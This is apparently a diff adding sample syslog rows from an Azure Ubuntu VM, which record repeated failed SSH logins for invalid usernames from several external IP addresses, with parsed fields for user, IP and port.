+10686,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:49:13,UbuntuDevEnv,2019-06-25 23:49:12,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=114.112.81.180,63965,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,114.112.81.1,,0,
+10687,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:49:13,UbuntuDevEnv,2019-06-25 23:49:12,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,63965,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10688,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:49:14,UbuntuDevEnv,2019-06-25 23:49:13,auth,UbuntuDevEnv,info,Failed password for invalid user noc from 88.247.110.88 port 39088 ssh2,63962,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,noc,88.247.110.8,39088,,
+10689,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:49:14,UbuntuDevEnv,2019-06-25 23:49:13,auth,UbuntuDevEnv,info,Disconnected from invalid user noc 88.247.110.88 port 39088 [preauth],63962,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,noc,88.247.110.8,39088,,
+10690,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:49:14,UbuntuDevEnv,2019-06-25 23:49:13,auth,UbuntuDevEnv,info,Received disconnect from 88.247.110.88 port 39088:11: Bye Bye [preauth],63962,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,88.247.110.8,39088,,
+10691,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:49:14,UbuntuDevEnv,2019-06-25 23:49:14,auth,UbuntuDevEnv,info,Failed password for invalid user share from 114.112.81.180 port 49038 ssh2,63965,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,share,114.112.81.1,49038,,
+10692,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:49:15,UbuntuDevEnv,2019-06-25 23:49:14,auth,UbuntuDevEnv,info,Received disconnect from 114.112.81.180 port 49038:11: Bye Bye [preauth],63965,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,114.112.81.1,49038,,
+10693,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:49:15,UbuntuDevEnv,2019-06-25 23:49:14,auth,UbuntuDevEnv,info,Disconnected from invalid user share 114.112.81.180 port 49038 [preauth],63965,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,share,114.112.81.1,49038,,
+10694,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:49:23,UbuntuDevEnv,2019-06-25 23:49:23,auth,UbuntuDevEnv,info,Invalid user elena from 138.68.12.43 port 36888,64004,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,elena,138.68.12.4,36888,,
+10695,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:49:23,UbuntuDevEnv,2019-06-25 23:49:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,64004,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10696,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:49:23,UbuntuDevEnv,2019-06-25 23:49:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.12.43,64004,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.12.4,,0,
+10697,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:49:25,UbuntuDevEnv,2019-06-25 23:49:24,auth,UbuntuDevEnv,info,Failed password for invalid user elena from 138.68.12.43 port 36888 ssh2,64004,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,elena,138.68.12.4,36888,,
+10698,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:49:25,UbuntuDevEnv,2019-06-25 23:49:25,auth,UbuntuDevEnv,info,Received disconnect from 138.68.12.43 port 36888:11: Bye Bye [preauth],64004,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.12.4,36888,,
+10699,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:49:25,UbuntuDevEnv,2019-06-25 23:49:25,auth,UbuntuDevEnv,info,Disconnected from invalid user elena 138.68.12.43 port 36888 [preauth],64004,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,elena,138.68.12.4,36888,,
+10700,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:49:56,UbuntuDevEnv,2019-06-25 23:49:56,auth,UbuntuDevEnv,info,Invalid user view from 131.100.219.3 port 57598,64118,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,view,131.100.219.3,57598,,
+10701,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:49:56,UbuntuDevEnv,2019-06-25 23:49:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.100.219.3,64118,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.100.219.3,,0,
+10702,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:49:56,UbuntuDevEnv,2019-06-25 23:49:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,64118,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10703,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:49:57,UbuntuDevEnv,2019-06-25 23:49:56,auth,UbuntuDevEnv,info,Invalid user pkjain from 196.27.127.61 port 50816,64130,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pkjain,196.27.127.6,50816,,
+10704,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:49:57,UbuntuDevEnv,2019-06-25 23:49:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.27.127.61,64130,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.27.127.6,,0,
+10705,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:49:57,UbuntuDevEnv,2019-06-25 23:49:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,64130,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10706,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:49:58,UbuntuDevEnv,2019-06-25 23:49:58,auth,UbuntuDevEnv,info,Failed password for invalid user view from 131.100.219.3 port 57598 ssh2,64118,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,view,131.100.219.3,57598,,
+10707,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:49:59,UbuntuDevEnv,2019-06-25 23:49:58,auth,UbuntuDevEnv,info,Disconnected from invalid user view 131.100.219.3 port 57598 [preauth],64118,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,view,131.100.219.3,57598,,
+10708,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:49:59,UbuntuDevEnv,2019-06-25 23:49:58,auth,UbuntuDevEnv,info,Received disconnect from 131.100.219.3 port 57598:11: Bye Bye [preauth],64118,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.100.219.3,57598,,
+10709,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:49:59,UbuntuDevEnv,2019-06-25 23:49:59,auth,UbuntuDevEnv,info,Failed password for invalid user pkjain from 196.27.127.61 port 50816 ssh2,64130,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pkjain,196.27.127.6,50816,,
+10710,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:50:00,UbuntuDevEnv,2019-06-25 23:49:59,auth,UbuntuDevEnv,info,Received disconnect from 196.27.127.61 port 50816:11: Bye Bye [preauth],64130,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.27.127.6,50816,,
+10711,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:50:00,UbuntuDevEnv,2019-06-25 23:49:59,auth,UbuntuDevEnv,info,Disconnected from invalid user pkjain 196.27.127.61 port 50816 [preauth],64130,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pkjain,196.27.127.6,50816,,
+10712,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:50:14,UbuntuDevEnv,2019-06-25 23:50:13,auth,UbuntuDevEnv,info,Connection closed by 203.195.235.135 port 51016 [preauth],64186,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,203.195.235.1,51016,,
+10713,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:50:55,UbuntuDevEnv,2019-06-25 23:50:55,auth,UbuntuDevEnv,info,Invalid user mitchell from 114.112.81.180 port 39756,64341,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mitchell,114.112.81.1,39756,,
+10714,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:50:55,UbuntuDevEnv,2019-06-25 23:50:55,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,64341,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10715,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:50:55,UbuntuDevEnv,2019-06-25 23:50:55,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=114.112.81.180,64341,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,114.112.81.1,,0,
+10716,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:50:57,UbuntuDevEnv,2019-06-25 23:50:56,auth,UbuntuDevEnv,info,Failed password for invalid user mitchell from 114.112.81.180 port 39756 ssh2,64341,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mitchell,114.112.81.1,39756,,
+10717,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:50:57,UbuntuDevEnv,2019-06-25 23:50:57,auth,UbuntuDevEnv,info,Disconnected from invalid user mitchell 114.112.81.180 port 39756 [preauth],64341,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mitchell,114.112.81.1,39756,,
+10718,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:50:57,UbuntuDevEnv,2019-06-25 23:50:57,auth,UbuntuDevEnv,info,Received disconnect from 114.112.81.180 port 39756:11: Bye Bye [preauth],64341,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,114.112.81.1,39756,,
+10719,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:50:57,UbuntuDevEnv,2019-06-25 23:50:57,auth,UbuntuDevEnv,info,Invalid user tan from 88.247.110.88 port 53583,64349,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tan,88.247.110.8,53583,,
+10720,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:50:57,UbuntuDevEnv,2019-06-25 23:50:57,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,64349,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10721,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:50:57,UbuntuDevEnv,2019-06-25 23:50:57,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=88.247.110.88,64349,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,88.247.110.8,,0,
+10722,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:51:00,UbuntuDevEnv,2019-06-25 23:50:59,auth,UbuntuDevEnv,info,Failed password for invalid user tan from 88.247.110.88 port 53583 ssh2,64349,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tan,88.247.110.8,53583,,
+10723,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:51:00,UbuntuDevEnv,2019-06-25 23:50:59,auth,UbuntuDevEnv,info,Disconnected from invalid user tan 88.247.110.88 port 53583 [preauth],64349,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tan,88.247.110.8,53583,,
+10724,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:51:00,UbuntuDevEnv,2019-06-25 23:50:59,auth,UbuntuDevEnv,info,Received disconnect from 88.247.110.88 port 53583:11: Bye Bye [preauth],64349,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,88.247.110.8,53583,,
+10725,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:57:15,UbuntuDevEnv,2019-06-25 23:57:15,auth,UbuntuDevEnv,info,Invalid user ez from 118.222.146.186 port 58064,65709,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ez,118.222.146.1,58064,,
+10726,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:57:15,UbuntuDevEnv,2019-06-25 23:57:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,65709,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10727,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:57:15,UbuntuDevEnv,2019-06-25 23:57:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.222.146.186,65709,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.222.146.1,,0,
+10728,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:57:17,UbuntuDevEnv,2019-06-25 23:57:17,auth,UbuntuDevEnv,info,Failed password for invalid user ez from 118.222.146.186 port 58064 ssh2,65709,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ez,118.222.146.1,58064,,
+10729,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:57:18,UbuntuDevEnv,2019-06-25 23:57:17,auth,UbuntuDevEnv,info,Received disconnect from 118.222.146.186 port 58064:11: Bye Bye [preauth],65709,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.222.146.1,58064,,
+10730,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:57:18,UbuntuDevEnv,2019-06-25 23:57:17,auth,UbuntuDevEnv,info,Disconnected from invalid user ez 118.222.146.186 port 58064 [preauth],65709,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ez,118.222.146.1,58064,,
+10731,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:57:34,UbuntuDevEnv,2019-06-25 23:57:33,auth,UbuntuDevEnv,info,Invalid user octro from 196.27.127.61 port 55867,65782,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,octro,196.27.127.6,55867,,
+10732,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:57:34,UbuntuDevEnv,2019-06-25 23:57:33,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,65782,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10733,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:57:34,UbuntuDevEnv,2019-06-25 23:57:33,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.27.127.61,65782,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.27.127.6,,0,
+10734,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:57:36,UbuntuDevEnv,2019-06-25 23:57:35,auth,UbuntuDevEnv,info,Failed password for invalid user octro from 196.27.127.61 port 55867 ssh2,65782,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,octro,196.27.127.6,55867,,
+10735,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:57:36,UbuntuDevEnv,2019-06-25 23:57:35,auth,UbuntuDevEnv,info,Received disconnect from 196.27.127.61 port 55867:11: Bye Bye [preauth],65782,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.27.127.6,55867,,
+10736,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:57:36,UbuntuDevEnv,2019-06-25 23:57:35,auth,UbuntuDevEnv,info,Disconnected from invalid user octro 196.27.127.61 port 55867 [preauth],65782,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,octro,196.27.127.6,55867,,
+10737,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:58:00,UbuntuDevEnv,2019-06-25 23:58:00,auth,UbuntuDevEnv,info,Invalid user armel from 88.247.110.88 port 17956,65872,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,armel,88.247.110.8,17956,,
+10738,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:58:00,UbuntuDevEnv,2019-06-25 23:58:00,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,65872,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10739,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:58:00,UbuntuDevEnv,2019-06-25 23:58:00,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=88.247.110.88,65872,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,88.247.110.8,,0,
+10740,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:58:02,UbuntuDevEnv,2019-06-25 23:58:02,auth,UbuntuDevEnv,info,Failed password for invalid user armel from 88.247.110.88 port 17956 ssh2,65872,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,armel,88.247.110.8,17956,,
+10741,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:58:03,UbuntuDevEnv,2019-06-25 23:58:02,auth,UbuntuDevEnv,info,Disconnected from invalid user armel 88.247.110.88 port 17956 [preauth],65872,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,armel,88.247.110.8,17956,,
+10742,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:58:03,UbuntuDevEnv,2019-06-25 23:58:02,auth,UbuntuDevEnv,info,Received disconnect from 88.247.110.88 port 17956:11: Bye Bye [preauth],65872,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,88.247.110.8,17956,,
+10743,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:58:03,UbuntuDevEnv,2019-06-25 23:58:02,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=114.112.81.180,65869,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,114.112.81.1,,0,
+10744,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:58:03,UbuntuDevEnv,2019-06-25 23:58:02,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,65869,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10745,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:58:03,UbuntuDevEnv,2019-06-25 23:58:02,auth,UbuntuDevEnv,info,Invalid user louis from 114.112.81.180 port 59506,65869,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,louis,114.112.81.1,59506,,
